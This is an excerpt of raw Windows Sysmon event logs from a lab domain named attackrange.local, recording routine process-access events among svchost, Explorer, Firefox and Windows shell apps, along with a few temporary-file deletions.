indows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001046189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001046188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001046187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001046186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf62a863.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57ad5|C:\Windows\System32\TwinUI.dll+37578|C:\Windows\System32\TwinUI.dll+37498|C:\Windows\System32\TwinUI.dll+388e3|C:\Windows\System32\TwinUI.dll+36ebd|C:\Windows\System32\TwinUI.dll+36cc1|C:\Windows\System32\TwinUI.dll+10923d|C:\Windows\System32\TwinUI.dll+d20cf|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57ad5|C:\Windows\System32\TwinUI.dll+375e0|C:\Windows\System32\TwinUI.dll+37485|C:\Windows\System32\TwinUI.dll+388e3|C:\Windows\System32\TwinUI.dll+36ebd|C:\Windows\System32\TwinUI.dll+36cc1|C:\Windows\System32\TwinUI.dll+10923d|C:\Windows\System32\TwinUI.dll+d20cf|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x80000000000000001046183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.121{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEBFB9074519C33D8F16D48A26366CC2,SHA256=FF5045CF3E69093F9BB10AB81486F627170F99E2D9173A23FF32BFBC97C87D3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806217Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:01.925{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 